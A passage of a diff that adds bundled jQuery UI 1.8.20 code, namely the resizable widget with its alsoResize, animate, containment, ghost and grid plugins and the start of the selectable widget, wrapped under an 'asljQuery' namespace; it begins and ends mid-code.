2069 |
+
curleft += $(o.containment).scrollLeft() || 0;
|
2070 |
+
curtop += $(o.containment).scrollTop() || 0;
|
2071 |
+
}
|
2072 |
+
|
2073 |
+
//Store needed variables
|
2074 |
+
this.offset = this.helper.offset();
|
2075 |
+
this.position = { left: curleft, top: curtop };
|
2076 |
+
this.size = this._helper ? { width: el.outerWidth(), height: el.outerHeight() } : { width: el.width(), height: el.height() };
|
2077 |
+
this.originalSize = this._helper ? { width: el.outerWidth(), height: el.outerHeight() } : { width: el.width(), height: el.height() };
|
2078 |
+
this.originalPosition = { left: curleft, top: curtop };
|
2079 |
+
this.sizeDiff = { width: el.outerWidth() - el.width(), height: el.outerHeight() - el.height() };
|
2080 |
+
this.originalMousePosition = { left: event.pageX, top: event.pageY };
|
2081 |
+
|
2082 |
+
//Aspect Ratio
|
2083 |
+
this.aspectRatio = (typeof o.aspectRatio == 'number') ? o.aspectRatio : ((this.originalSize.width / this.originalSize.height) || 1);
|
2084 |
+
|
2085 |
+
var cursor = $('.ui-resizable-' + this.axis).css('cursor');
|
2086 |
+
$('body').css('cursor', cursor == 'auto' ? this.axis + '-resize' : cursor);
|
2087 |
+
|
2088 |
+
el.addClass("ui-resizable-resizing");
|
2089 |
+
this._propagate("start", event);
|
2090 |
+
return true;
|
2091 |
+
},
|
2092 |
+
|
2093 |
+
_mouseDrag: function(event) {
|
2094 |
+
|
2095 |
+
//Increase performance, avoid regex
|
2096 |
+
var el = this.helper, o = this.options, props = {},
|
2097 |
+
self = this, smp = this.originalMousePosition, a = this.axis;
|
2098 |
+
|
2099 |
+
var dx = (event.pageX-smp.left)||0, dy = (event.pageY-smp.top)||0;
|
2100 |
+
var trigger = this._change[a];
|
2101 |
+
if (!trigger) return false;
|
2102 |
+
|
2103 |
+
// Calculate the attrs that will be change
|
2104 |
+
var data = trigger.apply(this, [event, dx, dy]), ie6 = $.browser.msie && $.browser.version < 7, csdif = this.sizeDiff;
|
2105 |
+
|
2106 |
+
// Put this in the mouseDrag handler since the user can start pressing shift while resizing
|
2107 |
+
this._updateVirtualBoundaries(event.shiftKey);
|
2108 |
+
if (this._aspectRatio || event.shiftKey)
|
2109 |
+
data = this._updateRatio(data, event);
|
2110 |
+
|
2111 |
+
data = this._respectSize(data, event);
|
2112 |
+
|
2113 |
+
// plugins callbacks need to be called first
|
2114 |
+
this._propagate("resize", event);
|
2115 |
+
|
2116 |
+
el.css({
|
2117 |
+
top: this.position.top + "px", left: this.position.left + "px",
|
2118 |
+
width: this.size.width + "px", height: this.size.height + "px"
|
2119 |
+
});
|
2120 |
+
|
2121 |
+
if (!this._helper && this._proportionallyResizeElements.length)
|
2122 |
+
this._proportionallyResize();
|
2123 |
+
|
2124 |
+
this._updateCache(data);
|
2125 |
+
|
2126 |
+
// calling the user callback at the end
|
2127 |
+
this._trigger('resize', event, this.ui());
|
2128 |
+
|
2129 |
+
return false;
|
2130 |
+
},
|
2131 |
+
|
2132 |
+
_mouseStop: function(event) {
|
2133 |
+
|
2134 |
+
this.resizing = false;
|
2135 |
+
var o = this.options, self = this;
|
2136 |
+
|
2137 |
+
if(this._helper) {
|
2138 |
+
var pr = this._proportionallyResizeElements, ista = pr.length && (/textarea/i).test(pr[0].nodeName),
|
2139 |
+
soffseth = ista && $.ui.hasScroll(pr[0], 'left') /* TODO - jump height */ ? 0 : self.sizeDiff.height,
|
2140 |
+
soffsetw = ista ? 0 : self.sizeDiff.width;
|
2141 |
+
|
2142 |
+
var s = { width: (self.helper.width() - soffsetw), height: (self.helper.height() - soffseth) },
|
2143 |
+
left = (parseInt(self.element.css('left'), 10) + (self.position.left - self.originalPosition.left)) || null,
|
2144 |
+
top = (parseInt(self.element.css('top'), 10) + (self.position.top - self.originalPosition.top)) || null;
|
2145 |
+
|
2146 |
+
if (!o.animate)
|
2147 |
+
this.element.css($.extend(s, { top: top, left: left }));
|
2148 |
+
|
2149 |
+
self.helper.height(self.size.height);
|
2150 |
+
self.helper.width(self.size.width);
|
2151 |
+
|
2152 |
+
if (this._helper && !o.animate) this._proportionallyResize();
|
2153 |
+
}
|
2154 |
+
|
2155 |
+
$('body').css('cursor', 'auto');
|
2156 |
+
|
2157 |
+
this.element.removeClass("ui-resizable-resizing");
|
2158 |
+
|
2159 |
+
this._propagate("stop", event);
|
2160 |
+
|
2161 |
+
if (this._helper) this.helper.remove();
|
2162 |
+
return false;
|
2163 |
+
|
2164 |
+
},
|
2165 |
+
|
2166 |
+
_updateVirtualBoundaries: function(forceAspectRatio) {
|
2167 |
+
var o = this.options, pMinWidth, pMaxWidth, pMinHeight, pMaxHeight, b;
|
2168 |
+
|
2169 |
+
b = {
|
2170 |
+
minWidth: isNumber(o.minWidth) ? o.minWidth : 0,
|
2171 |
+
maxWidth: isNumber(o.maxWidth) ? o.maxWidth : Infinity,
|
2172 |
+
minHeight: isNumber(o.minHeight) ? o.minHeight : 0,
|
2173 |
+
maxHeight: isNumber(o.maxHeight) ? o.maxHeight : Infinity
|
2174 |
+
};
|
2175 |
+
|
2176 |
+
if(this._aspectRatio || forceAspectRatio) {
|
2177 |
+
// We want to create an enclosing box whose aspect ration is the requested one
|
2178 |
+
// First, compute the "projected" size for each dimension based on the aspect ratio and other dimension
|
2179 |
+
pMinWidth = b.minHeight * this.aspectRatio;
|
2180 |
+
pMinHeight = b.minWidth / this.aspectRatio;
|
2181 |
+
pMaxWidth = b.maxHeight * this.aspectRatio;
|
2182 |
+
pMaxHeight = b.maxWidth / this.aspectRatio;
|
2183 |
+
|
2184 |
+
if(pMinWidth > b.minWidth) b.minWidth = pMinWidth;
|
2185 |
+
if(pMinHeight > b.minHeight) b.minHeight = pMinHeight;
|
2186 |
+
if(pMaxWidth < b.maxWidth) b.maxWidth = pMaxWidth;
|
2187 |
+
if(pMaxHeight < b.maxHeight) b.maxHeight = pMaxHeight;
|
2188 |
+
}
|
2189 |
+
this._vBoundaries = b;
|
2190 |
+
},
|
2191 |
+
|
2192 |
+
_updateCache: function(data) {
|
2193 |
+
var o = this.options;
|
2194 |
+
this.offset = this.helper.offset();
|
2195 |
+
if (isNumber(data.left)) this.position.left = data.left;
|
2196 |
+
if (isNumber(data.top)) this.position.top = data.top;
|
2197 |
+
if (isNumber(data.height)) this.size.height = data.height;
|
2198 |
+
if (isNumber(data.width)) this.size.width = data.width;
|
2199 |
+
},
|
2200 |
+
|
2201 |
+
_updateRatio: function(data, event) {
|
2202 |
+
|
2203 |
+
var o = this.options, cpos = this.position, csize = this.size, a = this.axis;
|
2204 |
+
|
2205 |
+
if (isNumber(data.height)) data.width = (data.height * this.aspectRatio);
|
2206 |
+
else if (isNumber(data.width)) data.height = (data.width / this.aspectRatio);
|
2207 |
+
|
2208 |
+
if (a == 'sw') {
|
2209 |
+
data.left = cpos.left + (csize.width - data.width);
|
2210 |
+
data.top = null;
|
2211 |
+
}
|
2212 |
+
if (a == 'nw') {
|
2213 |
+
data.top = cpos.top + (csize.height - data.height);
|
2214 |
+
data.left = cpos.left + (csize.width - data.width);
|
2215 |
+
}
|
2216 |
+
|
2217 |
+
return data;
|
2218 |
+
},
|
2219 |
+
|
2220 |
+
_respectSize: function(data, event) {
|
2221 |
+
|
2222 |
+
var el = this.helper, o = this._vBoundaries, pRatio = this._aspectRatio || event.shiftKey, a = this.axis,
|
2223 |
+
ismaxw = isNumber(data.width) && o.maxWidth && (o.maxWidth < data.width), ismaxh = isNumber(data.height) && o.maxHeight && (o.maxHeight < data.height),
|
2224 |
+
isminw = isNumber(data.width) && o.minWidth && (o.minWidth > data.width), isminh = isNumber(data.height) && o.minHeight && (o.minHeight > data.height);
|
2225 |
+
|
2226 |
+
if (isminw) data.width = o.minWidth;
|
2227 |
+
if (isminh) data.height = o.minHeight;
|
2228 |
+
if (ismaxw) data.width = o.maxWidth;
|
2229 |
+
if (ismaxh) data.height = o.maxHeight;
|
2230 |
+
|
2231 |
+
var dw = this.originalPosition.left + this.originalSize.width, dh = this.position.top + this.size.height;
|
2232 |
+
var cw = /sw|nw|w/.test(a), ch = /nw|ne|n/.test(a);
|
2233 |
+
|
2234 |
+
if (isminw && cw) data.left = dw - o.minWidth;
|
2235 |
+
if (ismaxw && cw) data.left = dw - o.maxWidth;
|
2236 |
+
if (isminh && ch) data.top = dh - o.minHeight;
|
2237 |
+
if (ismaxh && ch) data.top = dh - o.maxHeight;
|
2238 |
+
|
2239 |
+
// fixing jump error on top/left - bug #2330
|
2240 |
+
var isNotwh = !data.width && !data.height;
|
2241 |
+
if (isNotwh && !data.left && data.top) data.top = null;
|
2242 |
+
else if (isNotwh && !data.top && data.left) data.left = null;
|
2243 |
+
|
2244 |
+
return data;
|
2245 |
+
},
|
2246 |
+
|
2247 |
+
_proportionallyResize: function() {
|
2248 |
+
|
2249 |
+
var o = this.options;
|
2250 |
+
if (!this._proportionallyResizeElements.length) return;
|
2251 |
+
var element = this.helper || this.element;
|
2252 |
+
|
2253 |
+
for (var i=0; i < this._proportionallyResizeElements.length; i++) {
|
2254 |
+
|
2255 |
+
var prel = this._proportionallyResizeElements[i];
|
2256 |
+
|
2257 |
+
if (!this.borderDif) {
|
2258 |
+
var b = [prel.css('borderTopWidth'), prel.css('borderRightWidth'), prel.css('borderBottomWidth'), prel.css('borderLeftWidth')],
|
2259 |
+
p = [prel.css('paddingTop'), prel.css('paddingRight'), prel.css('paddingBottom'), prel.css('paddingLeft')];
|
2260 |
+
|
2261 |
+
this.borderDif = $.map(b, function(v, i) {
|
2262 |
+
var border = parseInt(v,10)||0, padding = parseInt(p[i],10)||0;
|
2263 |
+
return border + padding;
|
2264 |
+
});
|
2265 |
+
}
|
2266 |
+
|
2267 |
+
if ($.browser.msie && !(!($(element).is(':hidden') || $(element).parents(':hidden').length)))
|
2268 |
+
continue;
|
2269 |
+
|
2270 |
+
prel.css({
|
2271 |
+
height: (element.height() - this.borderDif[0] - this.borderDif[2]) || 0,
|
2272 |
+
width: (element.width() - this.borderDif[1] - this.borderDif[3]) || 0
|
2273 |
+
});
|
2274 |
+
|
2275 |
+
};
|
2276 |
+
|
2277 |
+
},
|
2278 |
+
|
2279 |
+
_renderProxy: function() {
|
2280 |
+
|
2281 |
+
var el = this.element, o = this.options;
|
2282 |
+
this.elementOffset = el.offset();
|
2283 |
+
|
2284 |
+
if(this._helper) {
|
2285 |
+
|
2286 |
+
this.helper = this.helper || $('<div style="overflow:hidden;"></div>');
|
2287 |
+
|
2288 |
+
// fix ie6 offset TODO: This seems broken
|
2289 |
+
var ie6 = $.browser.msie && $.browser.version < 7, ie6offset = (ie6 ? 1 : 0),
|
2290 |
+
pxyoffset = ( ie6 ? 2 : -1 );
|
2291 |
+
|
2292 |
+
this.helper.addClass(this._helper).css({
|
2293 |
+
width: this.element.outerWidth() + pxyoffset,
|
2294 |
+
height: this.element.outerHeight() + pxyoffset,
|
2295 |
+
position: 'absolute',
|
2296 |
+
left: this.elementOffset.left - ie6offset +'px',
|
2297 |
+
top: this.elementOffset.top - ie6offset +'px',
|
2298 |
+
zIndex: ++o.zIndex //TODO: Don't modify option
|
2299 |
+
});
|
2300 |
+
|
2301 |
+
this.helper
|
2302 |
+
.appendTo("body")
|
2303 |
+
.disableSelection();
|
2304 |
+
|
2305 |
+
} else {
|
2306 |
+
this.helper = this.element;
|
2307 |
+
}
|
2308 |
+
|
2309 |
+
},
|
2310 |
+
|
2311 |
+
_change: {
|
2312 |
+
e: function(event, dx, dy) {
|
2313 |
+
return { width: this.originalSize.width + dx };
|
2314 |
+
},
|
2315 |
+
w: function(event, dx, dy) {
|
2316 |
+
var o = this.options, cs = this.originalSize, sp = this.originalPosition;
|
2317 |
+
return { left: sp.left + dx, width: cs.width - dx };
|
2318 |
+
},
|
2319 |
+
n: function(event, dx, dy) {
|
2320 |
+
var o = this.options, cs = this.originalSize, sp = this.originalPosition;
|
2321 |
+
return { top: sp.top + dy, height: cs.height - dy };
|
2322 |
+
},
|
2323 |
+
s: function(event, dx, dy) {
|
2324 |
+
return { height: this.originalSize.height + dy };
|
2325 |
+
},
|
2326 |
+
se: function(event, dx, dy) {
|
2327 |
+
return $.extend(this._change.s.apply(this, arguments), this._change.e.apply(this, [event, dx, dy]));
|
2328 |
+
},
|
2329 |
+
sw: function(event, dx, dy) {
|
2330 |
+
return $.extend(this._change.s.apply(this, arguments), this._change.w.apply(this, [event, dx, dy]));
|
2331 |
+
},
|
2332 |
+
ne: function(event, dx, dy) {
|
2333 |
+
return $.extend(this._change.n.apply(this, arguments), this._change.e.apply(this, [event, dx, dy]));
|
2334 |
+
},
|
2335 |
+
nw: function(event, dx, dy) {
|
2336 |
+
return $.extend(this._change.n.apply(this, arguments), this._change.w.apply(this, [event, dx, dy]));
|
2337 |
+
}
|
2338 |
+
},
|
2339 |
+
|
2340 |
+
_propagate: function(n, event) {
|
2341 |
+
$.ui.plugin.call(this, n, [event, this.ui()]);
|
2342 |
+
(n != "resize" && this._trigger(n, event, this.ui()));
|
2343 |
+
},
|
2344 |
+
|
2345 |
+
plugins: {},
|
2346 |
+
|
2347 |
+
ui: function() {
|
2348 |
+
return {
|
2349 |
+
originalElement: this.originalElement,
|
2350 |
+
element: this.element,
|
2351 |
+
helper: this.helper,
|
2352 |
+
position: this.position,
|
2353 |
+
size: this.size,
|
2354 |
+
originalSize: this.originalSize,
|
2355 |
+
originalPosition: this.originalPosition
|
2356 |
+
};
|
2357 |
+
}
|
2358 |
+
|
2359 |
+
});
|
2360 |
+
|
2361 |
+
$.extend($.ui.resizable, {
|
2362 |
+
version: "1.8.20"
|
2363 |
+
});
|
2364 |
+
|
2365 |
+
/*
|
2366 |
+
* Resizable Extensions
|
2367 |
+
*/
|
2368 |
+
|
2369 |
+
$.ui.plugin.add("resizable", "alsoResize", {
|
2370 |
+
|
2371 |
+
start: function (event, ui) {
|
2372 |
+
var self = $(this).data("resizable"), o = self.options;
|
2373 |
+
|
2374 |
+
var _store = function (exp) {
|
2375 |
+
$(exp).each(function() {
|
2376 |
+
var el = $(this);
|
2377 |
+
el.data("resizable-alsoresize", {
|
2378 |
+
width: parseInt(el.width(), 10), height: parseInt(el.height(), 10),
|
2379 |
+
left: parseInt(el.css('left'), 10), top: parseInt(el.css('top'), 10)
|
2380 |
+
});
|
2381 |
+
});
|
2382 |
+
};
|
2383 |
+
|
2384 |
+
if (typeof(o.alsoResize) == 'object' && !o.alsoResize.parentNode) {
|
2385 |
+
if (o.alsoResize.length) { o.alsoResize = o.alsoResize[0]; _store(o.alsoResize); }
|
2386 |
+
else { $.each(o.alsoResize, function (exp) { _store(exp); }); }
|
2387 |
+
}else{
|
2388 |
+
_store(o.alsoResize);
|
2389 |
+
}
|
2390 |
+
},
|
2391 |
+
|
2392 |
+
resize: function (event, ui) {
|
2393 |
+
var self = $(this).data("resizable"), o = self.options, os = self.originalSize, op = self.originalPosition;
|
2394 |
+
|
2395 |
+
var delta = {
|
2396 |
+
height: (self.size.height - os.height) || 0, width: (self.size.width - os.width) || 0,
|
2397 |
+
top: (self.position.top - op.top) || 0, left: (self.position.left - op.left) || 0
|
2398 |
+
},
|
2399 |
+
|
2400 |
+
_alsoResize = function (exp, c) {
|
2401 |
+
$(exp).each(function() {
|
2402 |
+
var el = $(this), start = $(this).data("resizable-alsoresize"), style = {},
|
2403 |
+
css = c && c.length ? c : el.parents(ui.originalElement[0]).length ? ['width', 'height'] : ['width', 'height', 'top', 'left'];
|
2404 |
+
|
2405 |
+
$.each(css, function (i, prop) {
|
2406 |
+
var sum = (start[prop]||0) + (delta[prop]||0);
|
2407 |
+
if (sum && sum >= 0)
|
2408 |
+
style[prop] = sum || null;
|
2409 |
+
});
|
2410 |
+
|
2411 |
+
el.css(style);
|
2412 |
+
});
|
2413 |
+
};
|
2414 |
+
|
2415 |
+
if (typeof(o.alsoResize) == 'object' && !o.alsoResize.nodeType) {
|
2416 |
+
$.each(o.alsoResize, function (exp, c) { _alsoResize(exp, c); });
|
2417 |
+
}else{
|
2418 |
+
_alsoResize(o.alsoResize);
|
2419 |
+
}
|
2420 |
+
},
|
2421 |
+
|
2422 |
+
stop: function (event, ui) {
|
2423 |
+
$(this).removeData("resizable-alsoresize");
|
2424 |
+
}
|
2425 |
+
});
|
2426 |
+
|
2427 |
+
$.ui.plugin.add("resizable", "animate", {
|
2428 |
+
|
2429 |
+
stop: function(event, ui) {
|
2430 |
+
var self = $(this).data("resizable"), o = self.options;
|
2431 |
+
|
2432 |
+
var pr = self._proportionallyResizeElements, ista = pr.length && (/textarea/i).test(pr[0].nodeName),
|
2433 |
+
soffseth = ista && $.ui.hasScroll(pr[0], 'left') /* TODO - jump height */ ? 0 : self.sizeDiff.height,
|
2434 |
+
soffsetw = ista ? 0 : self.sizeDiff.width;
|
2435 |
+
|
2436 |
+
var style = { width: (self.size.width - soffsetw), height: (self.size.height - soffseth) },
|
2437 |
+
left = (parseInt(self.element.css('left'), 10) + (self.position.left - self.originalPosition.left)) || null,
|
2438 |
+
top = (parseInt(self.element.css('top'), 10) + (self.position.top - self.originalPosition.top)) || null;
|
2439 |
+
|
2440 |
+
self.element.animate(
|
2441 |
+
$.extend(style, top && left ? { top: top, left: left } : {}), {
|
2442 |
+
duration: o.animateDuration,
|
2443 |
+
easing: o.animateEasing,
|
2444 |
+
step: function() {
|
2445 |
+
|
2446 |
+
var data = {
|
2447 |
+
width: parseInt(self.element.css('width'), 10),
|
2448 |
+
height: parseInt(self.element.css('height'), 10),
|
2449 |
+
top: parseInt(self.element.css('top'), 10),
|
2450 |
+
left: parseInt(self.element.css('left'), 10)
|
2451 |
+
};
|
2452 |
+
|
2453 |
+
if (pr && pr.length) $(pr[0]).css({ width: data.width, height: data.height });
|
2454 |
+
|
2455 |
+
// propagating resize, and updating values for each animation step
|
2456 |
+
self._updateCache(data);
|
2457 |
+
self._propagate("resize", event);
|
2458 |
+
|
2459 |
+
}
|
2460 |
+
}
|
2461 |
+
);
|
2462 |
+
}
|
2463 |
+
|
2464 |
+
});
|
2465 |
+
|
2466 |
+
$.ui.plugin.add("resizable", "containment", {
|
2467 |
+
|
2468 |
+
start: function(event, ui) {
|
2469 |
+
var self = $(this).data("resizable"), o = self.options, el = self.element;
|
2470 |
+
var oc = o.containment, ce = (oc instanceof $) ? oc.get(0) : (/parent/.test(oc)) ? el.parent().get(0) : oc;
|
2471 |
+
if (!ce) return;
|
2472 |
+
|
2473 |
+
self.containerElement = $(ce);
|
2474 |
+
|
2475 |
+
if (/document/.test(oc) || oc == document) {
|
2476 |
+
self.containerOffset = { left: 0, top: 0 };
|
2477 |
+
self.containerPosition = { left: 0, top: 0 };
|
2478 |
+
|
2479 |
+
self.parentData = {
|
2480 |
+
element: $(document), left: 0, top: 0,
|
2481 |
+
width: $(document).width(), height: $(document).height() || document.body.parentNode.scrollHeight
|
2482 |
+
};
|
2483 |
+
}
|
2484 |
+
|
2485 |
+
// i'm a node, so compute top, left, right, bottom
|
2486 |
+
else {
|
2487 |
+
var element = $(ce), p = [];
|
2488 |
+
$([ "Top", "Right", "Left", "Bottom" ]).each(function(i, name) { p[i] = num(element.css("padding" + name)); });
|
2489 |
+
|
2490 |
+
self.containerOffset = element.offset();
|
2491 |
+
self.containerPosition = element.position();
|
2492 |
+
self.containerSize = { height: (element.innerHeight() - p[3]), width: (element.innerWidth() - p[1]) };
|
2493 |
+
|
2494 |
+
var co = self.containerOffset, ch = self.containerSize.height, cw = self.containerSize.width,
|
2495 |
+
width = ($.ui.hasScroll(ce, "left") ? ce.scrollWidth : cw ), height = ($.ui.hasScroll(ce) ? ce.scrollHeight : ch);
|
2496 |
+
|
2497 |
+
self.parentData = {
|
2498 |
+
element: ce, left: co.left, top: co.top, width: width, height: height
|
2499 |
+
};
|
2500 |
+
}
|
2501 |
+
},
|
2502 |
+
|
2503 |
+
resize: function(event, ui) {
|
2504 |
+
var self = $(this).data("resizable"), o = self.options,
|
2505 |
+
ps = self.containerSize, co = self.containerOffset, cs = self.size, cp = self.position,
|
2506 |
+
pRatio = self._aspectRatio || event.shiftKey, cop = { top:0, left:0 }, ce = self.containerElement;
|
2507 |
+
|
2508 |
+
if (ce[0] != document && (/static/).test(ce.css('position'))) cop = co;
|
2509 |
+
|
2510 |
+
if (cp.left < (self._helper ? co.left : 0)) {
|
2511 |
+
self.size.width = self.size.width + (self._helper ? (self.position.left - co.left) : (self.position.left - cop.left));
|
2512 |
+
if (pRatio) self.size.height = self.size.width / self.aspectRatio;
|
2513 |
+
self.position.left = o.helper ? co.left : 0;
|
2514 |
+
}
|
2515 |
+
|
2516 |
+
if (cp.top < (self._helper ? co.top : 0)) {
|
2517 |
+
self.size.height = self.size.height + (self._helper ? (self.position.top - co.top) : self.position.top);
|
2518 |
+
if (pRatio) self.size.width = self.size.height * self.aspectRatio;
|
2519 |
+
self.position.top = self._helper ? co.top : 0;
|
2520 |
+
}
|
2521 |
+
|
2522 |
+
self.offset.left = self.parentData.left+self.position.left;
|
2523 |
+
self.offset.top = self.parentData.top+self.position.top;
|
2524 |
+
|
2525 |
+
var woset = Math.abs( (self._helper ? self.offset.left - cop.left : (self.offset.left - cop.left)) + self.sizeDiff.width ),
|
2526 |
+
hoset = Math.abs( (self._helper ? self.offset.top - cop.top : (self.offset.top - co.top)) + self.sizeDiff.height );
|
2527 |
+
|
2528 |
+
var isParent = self.containerElement.get(0) == self.element.parent().get(0),
|
2529 |
+
isOffsetRelative = /relative|absolute/.test(self.containerElement.css('position'));
|
2530 |
+
|
2531 |
+
if(isParent && isOffsetRelative) woset -= self.parentData.left;
|
2532 |
+
|
2533 |
+
if (woset + self.size.width >= self.parentData.width) {
|
2534 |
+
self.size.width = self.parentData.width - woset;
|
2535 |
+
if (pRatio) self.size.height = self.size.width / self.aspectRatio;
|
2536 |
+
}
|
2537 |
+
|
2538 |
+
if (hoset + self.size.height >= self.parentData.height) {
|
2539 |
+
self.size.height = self.parentData.height - hoset;
|
2540 |
+
if (pRatio) self.size.width = self.size.height * self.aspectRatio;
|
2541 |
+
}
|
2542 |
+
},
|
2543 |
+
|
2544 |
+
stop: function(event, ui){
|
2545 |
+
var self = $(this).data("resizable"), o = self.options, cp = self.position,
|
2546 |
+
co = self.containerOffset, cop = self.containerPosition, ce = self.containerElement;
|
2547 |
+
|
2548 |
+
var helper = $(self.helper), ho = helper.offset(), w = helper.outerWidth() - self.sizeDiff.width, h = helper.outerHeight() - self.sizeDiff.height;
|
2549 |
+
|
2550 |
+
if (self._helper && !o.animate && (/relative/).test(ce.css('position')))
|
2551 |
+
$(this).css({ left: ho.left - cop.left - co.left, width: w, height: h });
|
2552 |
+
|
2553 |
+
if (self._helper && !o.animate && (/static/).test(ce.css('position')))
|
2554 |
+
$(this).css({ left: ho.left - cop.left - co.left, width: w, height: h });
|
2555 |
+
|
2556 |
+
}
|
2557 |
+
});
|
2558 |
+
|
2559 |
+
$.ui.plugin.add("resizable", "ghost", {
|
2560 |
+
|
2561 |
+
start: function(event, ui) {
|
2562 |
+
|
2563 |
+
var self = $(this).data("resizable"), o = self.options, cs = self.size;
|
2564 |
+
|
2565 |
+
self.ghost = self.originalElement.clone();
|
2566 |
+
self.ghost
|
2567 |
+
.css({ opacity: .25, display: 'block', position: 'relative', height: cs.height, width: cs.width, margin: 0, left: 0, top: 0 })
|
2568 |
+
.addClass('ui-resizable-ghost')
|
2569 |
+
.addClass(typeof o.ghost == 'string' ? o.ghost : '');
|
2570 |
+
|
2571 |
+
self.ghost.appendTo(self.helper);
|
2572 |
+
|
2573 |
+
},
|
2574 |
+
|
2575 |
+
resize: function(event, ui){
|
2576 |
+
var self = $(this).data("resizable"), o = self.options;
|
2577 |
+
if (self.ghost) self.ghost.css({ position: 'relative', height: self.size.height, width: self.size.width });
|
2578 |
+
},
|
2579 |
+
|
2580 |
+
stop: function(event, ui){
|
2581 |
+
var self = $(this).data("resizable"), o = self.options;
|
2582 |
+
if (self.ghost && self.helper) self.helper.get(0).removeChild(self.ghost.get(0));
|
2583 |
+
}
|
2584 |
+
|
2585 |
+
});
|
2586 |
+
|
2587 |
+
$.ui.plugin.add("resizable", "grid", {
|
2588 |
+
|
2589 |
+
resize: function(event, ui) {
|
2590 |
+
var self = $(this).data("resizable"), o = self.options, cs = self.size, os = self.originalSize, op = self.originalPosition, a = self.axis, ratio = o._aspectRatio || event.shiftKey;
|
2591 |
+
o.grid = typeof o.grid == "number" ? [o.grid, o.grid] : o.grid;
|
2592 |
+
var ox = Math.round((cs.width - os.width) / (o.grid[0]||1)) * (o.grid[0]||1), oy = Math.round((cs.height - os.height) / (o.grid[1]||1)) * (o.grid[1]||1);
|
2593 |
+
|
2594 |
+
if (/^(se|s|e)$/.test(a)) {
|
2595 |
+
self.size.width = os.width + ox;
|
2596 |
+
self.size.height = os.height + oy;
|
2597 |
+
}
|
2598 |
+
else if (/^(ne)$/.test(a)) {
|
2599 |
+
self.size.width = os.width + ox;
|
2600 |
+
self.size.height = os.height + oy;
|
2601 |
+
self.position.top = op.top - oy;
|
2602 |
+
}
|
2603 |
+
else if (/^(sw)$/.test(a)) {
|
2604 |
+
self.size.width = os.width + ox;
|
2605 |
+
self.size.height = os.height + oy;
|
2606 |
+
self.position.left = op.left - ox;
|
2607 |
+
}
|
2608 |
+
else {
|
2609 |
+
self.size.width = os.width + ox;
|
2610 |
+
self.size.height = os.height + oy;
|
2611 |
+
self.position.top = op.top - oy;
|
2612 |
+
self.position.left = op.left - ox;
|
2613 |
+
}
|
2614 |
+
}
|
2615 |
+
|
2616 |
+
});
|
2617 |
+
|
2618 |
+
var num = function(v) {
|
2619 |
+
return parseInt(v, 10) || 0;
|
2620 |
+
};
|
2621 |
+
|
2622 |
+
var isNumber = function(value) {
|
2623 |
+
return !isNaN(parseInt(value, 10));
|
2624 |
+
};
|
2625 |
+
|
2626 |
+
})(asljQuery);
|
2627 |
+
|
2628 |
+
(function( $, undefined ) {
|
2629 |
+
|
2630 |
+
$.widget("ui.selectable", $.ui.mouse, {
|
2631 |
+
options: {
|
2632 |
+
appendTo: 'body',
|
2633 |
+
autoRefresh: true,
|
2634 |
+
distance: 0,
|
2635 |
+
filter: '*',
|
2636 |
+
tolerance: 'touch'
|
2637 |
+
},
|
2638 |
+
_create: function() {
|
2639 |
+
var self = this;
|
2640 |
+
|
2641 |
+
this.element.addClass("ui-selectable");
|
2642 |
+
|
2643 |
+
this.dragged = false;
|
2644 |
+
|
2645 |
+
// cache selectee children based on filter
|
2646 |
+
var selectees;
|
2647 |
+
this.refresh = function() {
|
2648 |
+
selectees = $(self.options.filter, self.element[0]);
|
2649 |
+
selectees.addClass("ui-selectee");
|
2650 |
+
selectees.each(function() {
|
2651 |
+
var $this = $(this);
|
2652 |
+
var pos = $this.offset();
|
2653 |
+
$.data(this, "selectable-item", {
|
2654 |
+
element: this,
|
2655 |
+
$element: $this,
|
2656 |
+
left: pos.left,
|
2657 |
+
top: pos.top,
|
2658 |
+
right: pos.left + $this.outerWidth(),
|
2659 |
+
bottom: pos.top + $this.outerHeight(),
|
2660 |
+
startselected: false,
|
2661 |
+
selected: $this.hasClass('ui-selected'),
|
2662 |
+
selecting: $this.hasClass('ui-selecting'),
|
2663 |
+
unselecting: $this.hasClass('ui-unselecting')
|
2664 |
+
});
|
2665 |
+
});
|
2666 |
+
};
|
2667 |
+
this.refresh();
|
2668 |
+
|
2669 |
+
this.selectees = selectees.addClass("ui-selectee");
|
2670 |
+
|
2671 |
+
this._mouseInit();
|
2672 |
+
|
2673 |
+
this.helper = $("<div class='ui-selectable-helper'></div>");
|
2674 |
+
},
|
2675 |
+
|
2676 |
+
destroy: function() {
|
2677 |
+
this.selectees
|
2678 |
+
.removeClass("ui-selectee")
|
2679 |
+
.removeData("selectable-item");
|
2680 |
+
this.element
|
2681 |
+
.removeClass("ui-selectable ui-selectable-disabled")
|
2682 |
+
.removeData("selectable")
|
2683 |
+
.unbind(".selectable");
|
2684 |
+
this._mouseDestroy();
|
2685 |
+
|
2686 |
+
return this;
|
2687 |
+
},
|
2688 |
+
|
2689 |
+
_mouseStart: function(event) {
|
2690 |
+
var self = this;
|
2691 |
+
|
2692 |
+
this.opos = [event.pageX, event.pageY];
|
2693 |
+
|
2694 |
+
if (this.options.disabled)
|
2695 |
+
return;
|
2696 |
+
|
2697 |
+
var options = this.options;
|
2698 |
+
|
2699 |
+
this.selectees = $(options.filter, this.element[0]);
|
2700 |
+
|
2701 |
+
this._trigger("start", event);
|
2702 |
+
|
2703 |
+
$(options.appendTo).append(this.helper);
|
2704 |
+
// position helper (lasso)
|
2705 |
+
this.helper.css({
|
2706 |
+
"left": event.clientX,
|
2707 |
+
"top": event.clientY,
|
2708 |
+
"width": 0,
|
2709 |
+
"height": 0
|
2710 |
+
});
|
2711 |
+
|
2712 |
+
if (options.autoRefresh) {
|
2713 |
+
this.refresh();
|
2714 |
+
}
|
2715 |
+
|
2716 |
+
this.selectees.filter('.ui-selected').each(function() {
|
2717 |
+
var selectee = $.data(this, "selectable-item");
|
2718 |
+
selectee.startselected = true;
|
2719 |
+
if (!event.metaKey && !event.ctrlKey) {
|
2720 |
+
selectee.$element.removeClass('ui-selected');
|
2721 |
+
selectee.selected = false;
|
2722 |
+
selectee.$element.addClass('ui-unselecting');
|
2723 |
+
selectee.unselecting = true;
|
2724 |
+
// selectable UNSELECTING callback
|
2725 |
+
self._trigger("unselecting", event, {
|
2726 |
+
unselecting: selectee.element
|
2727 |
+
});
|
2728 |
+
}
|
2729 |
+
});
|
2730 |
+
|
2731 |
+
$(event.target).parents().andSelf().each(function() {
|
2732 |
+
var selectee = $.data(this, "selectable-item");
|
2733 |
+
if (selectee) {
|
2734 |
+
var doSelect = (!event.metaKey && !event.ctrlKey) || !selectee.$element.hasClass('ui-selected');
|
